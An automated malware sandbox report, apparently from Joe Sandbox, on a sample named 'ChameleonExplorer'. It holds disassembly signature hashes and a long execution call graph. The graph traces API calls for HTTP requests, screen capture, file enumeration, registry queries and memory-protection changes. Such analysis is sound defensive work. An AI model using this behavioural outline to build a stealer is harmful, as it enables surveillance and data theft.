                                                                                                            • API ID: FreeVirtual
                                                                                                            • String ID:
                                                                                                            • API String ID: 1263568516-0
                                                                                                            • Opcode ID: 907f4b7569431a7540a699e01e21496b410907f67c6c2524b60fb8b975af7873
                                                                                                            • Instruction ID: 9c8860078121e0cd719be057a62ba92c840d9b1616038f40df213ec0812b18e8
                                                                                                            • Opcode Fuzzy Hash: 907f4b7569431a7540a699e01e21496b410907f67c6c2524b60fb8b975af7873
                                                                                                            • Instruction Fuzzy Hash: FAF0ED78D05A2184FF1AEB12FCE9716AE585B96344FE40015B4685E2A08FBC92C4C741
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ExceptionRaise
                                                                                                            • String ID: H
                                                                                                            • API String ID: 3997070919-2852464175
                                                                                                            • Opcode ID: 30ae31d53f67b1b97da05918407c6e1b817595724ff1720de508a7648639e5ba
                                                                                                            • Instruction ID: 9b3a1fcb387a5fa124f88de2ff8895541f8bba7e998e7e286aa0cbbb29098add
                                                                                                            • Opcode Fuzzy Hash: 30ae31d53f67b1b97da05918407c6e1b817595724ff1720de508a7648639e5ba
                                                                                                            • Instruction Fuzzy Hash: 80D10436A08B8486D771EB15F4943ABB7A4F78A784F448529DACD47BA8DF7CC184CB40
                                                                                                            APIs
                                                                                                              • Part of subcall function 03329910: GetCurrentThreadId.KERNEL32 ref: 03329918
                                                                                                            • GetTickCount.KERNEL32 ref: 03329316
                                                                                                            • GetTickCount.KERNEL32 ref: 0332932F
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 03329369
                                                                                                            • GetTickCount.KERNEL32 ref: 0332939C
                                                                                                            • GetTickCount.KERNEL32 ref: 033293DA
                                                                                                            • GetTickCount.KERNEL32 ref: 03329409
                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 0332947F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CountTick$CurrentThread
                                                                                                            • String ID:
                                                                                                            • API String ID: 3968769311-0
                                                                                                            • Opcode ID: a8d4bbb3f989b62a580673071860fff90fd498d76811550264ad4728d208a904
                                                                                                            • Instruction ID: 00f3a3bb93436069d61b179bac1f0ade107551c2f1cb14fb9caa5bb9ef483c9b
                                                                                                            • Opcode Fuzzy Hash: a8d4bbb3f989b62a580673071860fff90fd498d76811550264ad4728d208a904
                                                                                                            • Instruction Fuzzy Hash: 0F41C4367016218EDB25CE3AD9D076E2F94FB48BACF195229DE0D8BB54DB31C4D18780
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID: Error$Runtime error at 0000000000000000
                                                                                                            • API String ID: 3320372497-326393251
                                                                                                            • Opcode ID: fce14d3aa193777544efd357b1419e206242d4d6fc658ce1d4404a245c2956f7
                                                                                                            • Instruction ID: f31bcb94cc2a64904ae9efdcc05f7df845da32516462e090e895050577c13172
                                                                                                            • Opcode Fuzzy Hash: fce14d3aa193777544efd357b1419e206242d4d6fc658ce1d4404a245c2956f7
                                                                                                            • Instruction Fuzzy Hash: 9911F970A00B50D1FB22D772F894BD67B68BB88750F84420AAA590E3E4DFBCC384C741
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: ArraySafe$BoundIndex$CopyCreateVariant
                                                                                                            • String ID:
                                                                                                            • API String ID: 351091851-0
                                                                                                            • Opcode ID: f1e92f4fc96b21d4afc7bfdf1581951038034155663d0e200a3a16e926de1310
                                                                                                            • Instruction ID: b6810eb5641cc00a2b8aa281addb0f3ebf1ac1ba59fe48adf9353e55fc94d89f
                                                                                                            • Opcode Fuzzy Hash: f1e92f4fc96b21d4afc7bfdf1581951038034155663d0e200a3a16e926de1310
                                                                                                            • Instruction Fuzzy Hash: E5416D36A007508ACF24EF75D8D0AEE7366F744BC8B089511FE5A9BB18EB39D442C380
                                                                                                            APIs
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: FileHandleWrite
                                                                                                            • String ID:
                                                                                                            • API String ID: 3320372497-0
                                                                                                            • Opcode ID: ac90d7c63a92a973ba46d1f235bae17841751114b33d6989592fd13c078a7ee8
                                                                                                            • Instruction ID: 59267b624cc52ccb615b1720b8d7347e524428b9a1d65c1ddd7ee84cb31a80ad
                                                                                                            • Opcode Fuzzy Hash: ac90d7c63a92a973ba46d1f235bae17841751114b33d6989592fd13c078a7ee8
                                                                                                            • Instruction Fuzzy Hash: 4E11C276710A7484E615EFB3BC9079A6E54BB45FD4F044226AE5E0FBD4CE38C1418790
                                                                                                            APIs
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: AddressHandleModuleProclstrlen
                                                                                                            • String ID: GetLongPathNameW$kernel32.dll
                                                                                                            • API String ID: 3607816002-568771998
                                                                                                            • Opcode ID: 90f9d78a22d5f1cad26b0ec37224b2317c8a06b8499cbf7c8c26fb722b0e8ad8
                                                                                                            • Instruction ID: 5a6171a180f3d1c99c76817fcbc5b10990ef33b54664eea2e2dedd2c92bc6cbb
                                                                                                            • Opcode Fuzzy Hash: 90f9d78a22d5f1cad26b0ec37224b2317c8a06b8499cbf7c8c26fb722b0e8ad8
                                                                                                            • Instruction Fuzzy Hash: CF517136700B6194CB24DF26D8D42E96B71FB48BECF4992269E0D5BB68EF78C585C340
                                                                                                            APIs
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 0332F921
                                                                                                            • EnterCriticalSection.KERNEL32 ref: 0332F9F7
                                                                                                            • LeaveCriticalSection.KERNEL32 ref: 0332FA30
                                                                                                            Strings
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: CriticalSection$Leave$Enter
                                                                                                            • String ID: en-GB,en,en-US,
                                                                                                            • API String ID: 2978645861-3021119265
                                                                                                            • Opcode ID: 3cc591147d5eca7391baeacbe979723ce54a6e938ee10206e13814fad2db1b66
                                                                                                            • Instruction ID: daa049e8156e4fb0098f3d09d34476546e2e8812720a01bb509e1dd4feac28b6
                                                                                                            • Opcode Fuzzy Hash: 3cc591147d5eca7391baeacbe979723ce54a6e938ee10206e13814fad2db1b66
                                                                                                            • Instruction Fuzzy Hash: 5E415175610B2098DB10EF75D8D03E92B36EB95B9CF942112FA5E4BA68DF74C581C390
                                                                                                            APIs
                                                                                                            • GetThreadUILanguage.KERNEL32 ref: 0332F769
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0332F7E0
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0332F84F
                                                                                                            • SetThreadPreferredUILanguages.KERNEL32 ref: 0332F88F
                                                                                                              • Part of subcall function 0332F6F0: GetThreadPreferredUILanguages.KERNEL32 ref: 0332F716
                                                                                                              • Part of subcall function 0332F6F0: GetThreadPreferredUILanguages.KERNEL32 ref: 0332F73F
                                                                                                            Memory Dump Source
                                                                                                            • Source File: 00000014.00000002.2155204603.0000000003321000.00000020.00000001.01000000.00000011.sdmp, Offset: 03320000, based on PE: true
                                                                                                            • Associated: 00000014.00000002.2155157735.0000000003320000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2155204603.000000000340C000.00000020.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157795495.0000000003414000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157917750.000000000341D000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2157974752.000000000341E000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158027095.000000000341F000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158090501.0000000003421000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158141559.0000000003422000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158209247.0000000003424000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158261577.0000000003425000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158326029.0000000003427000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158326029.000000000342D000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158473047.0000000003432000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158530457.0000000003434000.00000008.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158580343.0000000003435000.00000004.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003436000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            • Associated: 00000014.00000002.2158635623.0000000003438000.00000002.00000001.01000000.00000011.sdmp
                                                                                                            Joe Sandbox IDA Plugin
                                                                                                            • Snapshot File: hcaresult_20_2_3320000_ChameleonExplorer.jbxd
                                                                                                            Similarity
                                                                                                            • API ID: Thread$LanguagesPreferred$Language
                                                                                                            • String ID:
                                                                                                            • API String ID: 2255706666-0
                                                                                                            • Opcode ID: 993b11deb205f4daf21b330f373d00d8343a75854a04e47f9f46afe1bf24d38e
                                                                                                            • Instruction ID: d0d1bcf6e746ffd60204e65d2d0a187f5546356c64bccd8e4182cb5d18368c3f
                                                                                                            • Opcode Fuzzy Hash: 993b11deb205f4daf21b330f373d00d8343a75854a04e47f9f46afe1bf24d38e
                                                                                                            • Instruction Fuzzy Hash: 5831A2766016708ADB54DF35CA943EA7B62EB44BD9F486026FE0B4BB58DB74C8C9C340

                                                                                                            Execution Graph

                                                                                                            Execution Coverage:12.4%
                                                                                                            Dynamic/Decrypted Code Coverage:22.8%
                                                                                                            Signature Coverage:10.2%
                                                                                                            Total number of Nodes:2000
                                                                                                            Total number of Limit Nodes:13
                                                                                                            execution_graph 18101 417236 18102 417245 20 API calls 18101->18102 18103 417349 18101->18103 18102->18103 18104 600dc8 18105 600dec VirtualProtectEx 18104->18105 18107 600e2e VirtualProtectEx 18105->18107 18110 600fb7 GetPEB 18107->18110 18109 600e5d 18123 601162 NtProtectVirtualMemory 18110->18123 18112 6010a4 18112->18109 18113 600fec 18113->18112 18114 6010a7 18113->18114 18119 601015 18113->18119 18117 601110 18114->18117 18118 6010c9 18114->18118 18116 60115f 18116->18109 18126 601162 NtProtectVirtualMemory 18117->18126 18125 601162 NtProtectVirtualMemory 18118->18125 18119->18119 18124 601162 NtProtectVirtualMemory 18119->18124 18122 60110d 18122->18109 18123->18113 18124->18112 18125->18122 18126->18116 18127 41a218 18134 404d5c GetModuleHandleA 18127->18134 18129 41a228 18136 4186e4 18129->18136 18135 404d8f 18134->18135 18135->18129 18137 4186ec 18136->18137 18410 4034e4 18137->18410 18143 418731 18419 407de0 18143->18419 18149 41875a 18150 418765 CreateMutexA 18149->18150 18151 41877f 18150->18151 18152 41967c 18151->18152 18153 40357c 13 API calls 18151->18153 18154 4034e4 13 API calls 18152->18154 18155 418797 18153->18155 18156 419694 18154->18156 18489 416df4 18155->18489 19236 403bf4 18156->19236 18162 4034e4 13 API calls 18164 4196af 18162->18164 18166 403bf4 SysFreeString 18164->18166 18165 40357c 13 API calls 18167 4187c5 18165->18167 18168 4196bf 18166->18168 18170 406ce8 43 API calls 18167->18170 19240 403508 18168->19240 18172 4187d0 18170->18172 18506 406834 18172->18506 18177 403508 13 API calls 18179 4196ea 18177->18179 18182 403bdc SysFreeString 18179->18182 18180 4187f4 18181 416df4 27 API calls 18180->18181 18183 418804 18181->18183 18184 4196f5 18182->18184 18541 417da4 18183->18541 18186 403508 13 API calls 18184->18186 18188 419705 18186->18188 18190 403bdc SysFreeString 18188->18190 18189 416df4 27 API calls 18198 418825 
18189->18198 18191 419710 18190->18191 18192 403508 13 API calls 18191->18192 18193 419720 18192->18193 18194 403bdc SysFreeString 18193->18194 18195 41972b 18194->18195 18196 403508 13 API calls 18195->18196 18197 41973b 18196->18197 18199 403bdc SysFreeString 18197->18199 18198->18152 18616 4074e8 18198->18616 18201 419746 18199->18201 18203 403508 13 API calls 18201->18203 18205 419756 18203->18205 18204 4069a8 27 API calls 18206 418872 18204->18206 18208 403bdc SysFreeString 18205->18208 18207 4074e8 27 API calls 18206->18207 18209 41888b 18207->18209 18210 419761 18208->18210 18626 406b08 18209->18626 18212 403508 13 API calls 18210->18212 18214 419771 18212->18214 18216 403bdc SysFreeString 18214->18216 18218 41977c 18216->18218 18220 403508 13 API calls 18218->18220 18219 4074e8 27 API calls 18221 4188c2 18219->18221 18222 41978c 18220->18222 18223 4069a8 27 API calls 18221->18223 18224 403bdc SysFreeString 18222->18224 18225 4188d3 18223->18225 18226 419797 18224->18226 18648 408180 18225->18648 18227 403508 13 API calls 18226->18227 18229 4197a7 18227->18229 18231 403bf4 SysFreeString 18229->18231 18233 4197b7 18231->18233 18234 4034e4 13 API calls 18233->18234 18235 4197c2 18234->18235 18236 403bf4 SysFreeString 18235->18236 18237 4197d2 18236->18237 18239 4034e4 13 API calls 18237->18239 18238 418fd5 18823 4169ac 18238->18823 18240 4197dd 18239->18240 18242 403bf4 SysFreeString 18240->18242 18244 4197ed 18242->18244 18246 4034e4 13 API calls 18244->18246 18249 4197f8 18246->18249 18251 403bf4 SysFreeString 18249->18251 18255 419808 18251->18255 18253 407a18 32 API calls 18287 4188e6 18253->18287 18257 4034e4 13 API calls 18255->18257 18260 419813 18257->18260 18259 403850 27 API calls 18259->18287 18266 403bf4 SysFreeString 18260->18266 18262 40357c 13 API calls 18262->18287 18270 419823 18266->18270 18273 403508 13 API calls 18270->18273 18272 40e6d4 28 API calls 18272->18287 18276 419833 18273->18276 18280 4034e4 13 API calls 18276->18280 18279 418b1d 
GetSystemMetrics GetSystemMetrics 19176 416fd0 18279->19176 18285 41983b 18280->18285 18283 417da4 65 API calls 18283->18287 18284 41899b 18284->18287 18290 413f58 53 API calls 18284->18290 18292 407108 15 API calls 18284->18292 18316 413f58 53 API calls 18284->18316 18319 40717c 8 API calls 18284->18319 18323 4034e4 13 API calls 18284->18323 18325 403850 27 API calls 18284->18325 18354 4037dc 27 API calls 18284->18354 18359 413f58 53 API calls 18284->18359 18951 414de8 18284->18951 19032 405114 18284->19032 19060 413f58 18284->19060 19195 403cf4 18284->19195 19211 403db4 18284->19211 19217 4078d8 18284->19217 19247 404280 18285->19247 18287->18152 18287->18238 18287->18253 18287->18259 18287->18262 18287->18272 18287->18279 18287->18283 18287->18284 18291 4074e8 27 API calls 18287->18291 18913 40e1dc 18287->18913 18934 405424 18287->18934 18938 413bb4 18287->18938 18943 405574 18287->18943 18948 413be8 18287->18948 19040 414808 18287->19040 19144 414a90 18287->19144 19189 40709c 18287->19189 18289 41984e 18293 403508 13 API calls 18289->18293 18290->18284 18291->18287 18292->18284 18295 41985b 18293->18295 18297 4034e4 13 API calls 18295->18297 18300 419863 18297->18300 18302 403508 13 API calls 18300->18302 18304 419870 18302->18304 18305 403508 13 API calls 18304->18305 18306 41987d 18305->18306 18398 4033f4 18306->18398 18316->18287 18319->18284 18323->18284 18325->18284 18354->18284 18359->18287 18399 40340d 18398->18399 18400 40342c 18399->18400 18401 40343d 18399->18401 22293 403368 18400->22293 22289 4031dc 18401->22289 18404 403436 18404->18401 18405 403452 18406 403478 FreeLibrary 18405->18406 18408 40347e 18405->18408 18406->18408 18407 4034b3 18408->18407 18409 4034ab ExitProcess 18408->18409 18411 4034ea 18410->18411 18413 403505 18410->18413 18411->18413 19272 402550 18411->19272 18414 40357c 18413->18414 18415 403580 18414->18415 18416 4035a4 18415->18416 18417 402550 13 API calls 18415->18417 18418 405668 62 API calls 18416->18418 18417->18416 
18418->18143 19286 403538 18419->19286 18423 407df9 18424 407e09 18423->18424 18426 403538 27 API calls 18423->18426 18425 407c34 2 API calls 18424->18425 18427 407e13 18425->18427 18426->18424 18428 407e23 18427->18428 18429 403538 27 API calls 18427->18429 18430 407c34 2 API calls 18428->18430 18429->18428 18431 407e2d 18430->18431 18432 407e3d 18431->18432 18433 403538 27 API calls 18431->18433 19297 407d14 18432->19297 18433->18432 18435 407e42 18436 407e52 18435->18436 18437 403538 27 API calls 18435->18437 18438 406ce8 18436->18438 18437->18436 18439 406cf0 18438->18439 18439->18439 18440 406d13 18439->18440 18441 406d25 18439->18441 18442 403538 27 API calls 18440->18442 19425 406f30 18441->19425 18445 406d20 18442->18445 18444 406d2d 19430 406bd8 18444->19430 18447 403508 13 API calls 18445->18447 18449 406e37 18447->18449 18448 406d40 19438 4065f0 GetUserNameW 18448->19438 18450 403bf4 SysFreeString 18449->18450 18451 406e44 18450->18451 18452 403508 13 API calls 18451->18452 18454 406e51 18452->18454 18475 403798 18454->18475 18455 406d53 19444 406634 18455->19444 18457 406d66 19451 40627c 18457->19451 18460 40627c 27 API calls 18461 406d8a 18460->18461 18462 40627c 27 API calls 18461->18462 18463 406d98 18462->18463 18464 40627c 27 API calls 18463->18464 18465 406da6 18464->18465 18466 403850 27 API calls 18465->18466 18467 406dc2 18466->18467 18468 40627c 27 API calls 18467->18468 18469 406dcd 18468->18469 18470 403850 27 API calls 18469->18470 18472 406ddd 18470->18472 18471 406e13 18473 403538 27 API calls 18471->18473 18472->18471 19461 403a78 18472->19461 18473->18445 18476 4037db 18475->18476 18477 40379c 18475->18477 18476->18149 18478 4037a6 18477->18478 18479 403538 18477->18479 18480 4037d0 18478->18480 18481 4037b9 18478->18481 18485 4035a8 27 API calls 18479->18485 18486 40354c 18479->18486 18483 403b1c 27 API calls 18480->18483 18482 403b1c 27 API calls 18481->18482 18488 4037be 18482->18488 18483->18488 18484 40357a 18484->18149 
18485->18486 18486->18484 18487 402550 13 API calls 18486->18487 18487->18484 18488->18149 18491 416e0d 18489->18491 18490 416e75 18492 4034e4 13 API calls 18490->18492 18491->18490 19522 4039e8 18491->19522 18494 416e8a 18492->18494 18495 4069a8 18494->18495 18496 4069c7 18495->18496 18497 4034e4 13 API calls 18496->18497 18498 4069dd 18497->18498 18499 406a88 18498->18499 18504 4036cc 27 API calls 18498->18504 18505 403798 27 API calls 18498->18505 18500 403508 13 API calls 18499->18500 18501 406aa2 18500->18501 18502 4034e4 13 API calls 18501->18502 18503 406aaa 18502->18503 18503->18165 18504->18498 18505->18498 18507 40684d 18506->18507 18508 4034e4 13 API calls 18507->18508 18513 406862 18508->18513 18509 4068d2 18510 403508 13 API calls 18509->18510 18512 4068ec 18510->18512 18515 4034e4 13 API calls 18512->18515 18513->18509 18514 40680c 27 API calls 18513->18514 18517 403798 27 API calls 18513->18517 18518 403850 27 API calls 18513->18518 19528 4036cc 18513->19528 18514->18513 18516 4068f4 18515->18516 18519 4037dc 18516->18519 18517->18513 18518->18513 18520 4037e0 18519->18520 18528 403798 18519->18528 18521 403538 18520->18521 18523 4037f0 18520->18523 18524 4037fe 18520->18524 18520->18528 18526 4035a8 27 API calls 18521->18526 18531 40354c 18521->18531 18522 40357a 18522->18180 18529 403538 27 API calls 18523->18529 18525 4035a8 27 API calls 18524->18525 18530 403811 18525->18530 18526->18531 18527 4037db 18527->18180 18528->18521 18528->18527 18532 4037a6 18528->18532 18529->18528 18539 403538 27 API calls 18530->18539 18531->18522 18533 402550 13 API calls 18531->18533 18534 4037d0 18532->18534 18535 4037b9 18532->18535 18533->18522 18537 403b1c 27 API calls 18534->18537 18536 403b1c 27 API calls 18535->18536 18538 4037be 18536->18538 18537->18538 18538->18180 18540 40383d 18539->18540 18540->18180 18542 417dad 18541->18542 18543 417e02 18542->18543 18544 40357c 13 API calls 18542->18544 18545 4034e4 13 API calls 18543->18545 18544->18543 18546 
417e0a 18545->18546 18547 40357c 13 API calls 18546->18547 18548 417e15 18547->18548 18549 40357c 13 API calls 18548->18549 18550 417e26 18549->18550 18551 4039e8 27 API calls 18550->18551 18552 417e2e GetModuleHandleA 18551->18552 18553 417e4a 18552->18553 18554 417e3a 18552->18554 18555 4039e8 27 API calls 18553->18555 18556 4039e8 27 API calls 18554->18556 18558 417e52 GetProcAddress 18555->18558 18557 417e42 LoadLibraryA 18556->18557 18557->18553 18559 4039e8 27 API calls 18558->18559 18560 417e67 GetProcAddress 18559->18560 18561 4039e8 27 API calls 18560->18561 18562 417e7c GetProcAddress 18561->18562 18563 4039e8 27 API calls 18562->18563 18564 417e91 GetProcAddress 18563->18564 18565 4039e8 27 API calls 18564->18565 18566 417ea6 GetProcAddress 18565->18566 18567 4039e8 27 API calls 18566->18567 18568 417ebb GetProcAddress 18567->18568 18569 4039e8 27 API calls 18568->18569 18570 417ed0 GetProcAddress 18569->18570 18571 4039e8 27 API calls 18570->18571 18572 417ee4 GetProcAddress 18571->18572 18573 4039e8 27 API calls 18572->18573 18574 417efb GetProcAddress 18573->18574 18575 417f17 18574->18575 18576 417fed InternetCrackUrlA 18575->18576 18577 417ffc 18576->18577 19531 4039f0 18577->19531 18579 41801d 18580 418072 InternetOpenA 18579->18580 18583 4037dc 27 API calls 18579->18583 18581 4181d1 18580->18581 18582 41808c InternetConnectA 18580->18582 18584 4181e0 18581->18584 18588 418223 18581->18588 18582->18581 18595 4180cf 18582->18595 18585 418056 18583->18585 19559 417840 18584->19559 19538 417688 18585->19538 18589 41825a 18588->18589 18592 40627c 27 API calls 18588->18592 18590 403538 27 API calls 18589->18590 18593 418265 18590->18593 18591 418064 18591->18580 18598 418240 18592->18598 18596 4034e4 13 API calls 18593->18596 18600 418117 HttpOpenRequestA 18595->18600 18597 41826d 18596->18597 18599 403508 13 API calls 18597->18599 18598->18589 18601 4034e4 13 API calls 18598->18601 18602 41828a 18599->18602 18603 4181cb InternetCloseHandle 18600->18603 
[Execution graph: call-graph edge data (node ids, code addresses and API names) that does not render as text. API names recoverable from this portion of the graph: HttpSendRequestA, InternetReadFile, CreateDirectoryW, SetCurrentDirectoryW, LoadLibraryExW, LoadLibraryA, GetModuleHandleA, GetProcAddress, GetModuleFileNameA, GetSystemMetrics, GetCurrentProcess, GetPEB, SysAllocStringLen, SysReAllocStringLen, SysFreeString, MultiByteToWideChar, GetFileAttributesW, FindFirstFileW, FindNextFileW, FindClose, WriteFile, GetDC, CreateCompatibleDC, CreateCompatibleBitmap, SelectObject, BitBlt, CreateStreamOnHGlobal, GlobalUnlock, DeleteObject, DeleteDC, ReleaseDC, CheckTokenMembership, FreeSid, LookupAccountSidA, RtlInitializeCriticalSection, RtlEnterCriticalSection, RtlLeaveCriticalSection, LocalAlloc, VirtualAlloc, VirtualFree, RegCreateKeyExW, RegOpenKeyExW, RegQueryValueExW, RegCloseKey.]
403d6c SysFreeString SysAllocStringLen SysFreeString SysAllocStringLen 20495->20496 20497 40ab9e 20495->20497 20498 403e78 SysAllocStringLen SysAllocStringLen SysFreeString 20495->20498 20504 40a6f0 20495->20504 20496->20495 20500 403bf4 SysFreeString 20497->20500 20498->20495 20501 40abc8 20500->20501 20502 403bf4 SysFreeString 20501->20502 20503 40abd5 20502->20503 20503->20130 20505 40a6f9 20504->20505 20505->20505 20506 404150 SysAllocStringLen 20505->20506 20507 40a716 20506->20507 20508 404150 SysAllocStringLen 20507->20508 20509 40a71e 20508->20509 20510 404150 SysAllocStringLen 20509->20510 20511 40a726 20510->20511 20512 4034e4 13 API calls 20511->20512 20513 40a73c 20512->20513 20514 40709c 4 API calls 20513->20514 20515 40a74d 20514->20515 20549 406fdc 20515->20549 20577 4027b4 QueryPerformanceCounter 20549->20577 20595 40bef6 20594->20595 20596 40bf03 LoadLibraryA GetProcAddress 20595->20596 20597 40bf25 20596->20597 20598 40bf5b LoadLibraryA 20597->20598 20599 40c0a3 20598->20599 20600 40bf6b 20598->20600 20601 403bf4 SysFreeString 20599->20601 20602 40bf77 GetProcAddress 20600->20602 20603 40c0bd 20601->20603 20604 403990 20602->20604 20605 403508 13 API calls 20603->20605 20606 40bf8c GetProcAddress 20604->20606 20608 40c0ca 20605->20608 20607 403990 20606->20607 20609 40bfa1 GetProcAddress 20607->20609 20610 404280 15 API calls 20608->20610 20612 40bfbc 20609->20612 20611 40c0dd 20610->20611 20611->20254 20612->20599 20613 404810 15 API calls 20612->20613 20614 40370c 28 API calls 20612->20614 20615 40525c 32 API calls 20612->20615 20613->20612 20614->20612 20615->20612 20617 40bba2 20616->20617 20618 4034e4 13 API calls 20617->20618 20619 40bbb7 20618->20619 20626 40baf0 20619->20626 20622 40bbca 20624 4034e4 13 API calls 20622->20624 20625 40bbdf 20624->20625 20625->20265 20627 4075c0 8 API calls 20626->20627 20628 40bb25 20627->20628 20629 403bdc SysFreeString 20628->20629 20630 40bb64 20629->20630 20631 4034e4 13 API calls 20630->20631 20632 
